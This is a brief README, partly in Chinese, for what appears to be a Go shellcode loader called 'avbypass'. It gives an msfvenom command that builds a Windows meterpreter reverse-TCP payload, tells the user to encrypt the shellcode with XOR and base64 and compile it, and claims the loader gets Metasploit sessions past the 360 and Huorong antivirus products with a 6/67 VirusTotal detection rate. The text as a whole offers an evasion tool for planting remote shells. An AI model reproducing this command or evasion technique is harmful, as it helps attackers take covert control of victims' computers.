msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxx -f raw -o payload.bin
使用程序生成加密的shellcode后,填入指定位置,编译执行即可。
通过xor和base64多层加密shellcode实现的go加载器bypassav,
实测在开启360和火绒的情况下msf正常上线
virustotal结果 6/67,后续有时间会慢慢修改
# avbypass
"# avbypass"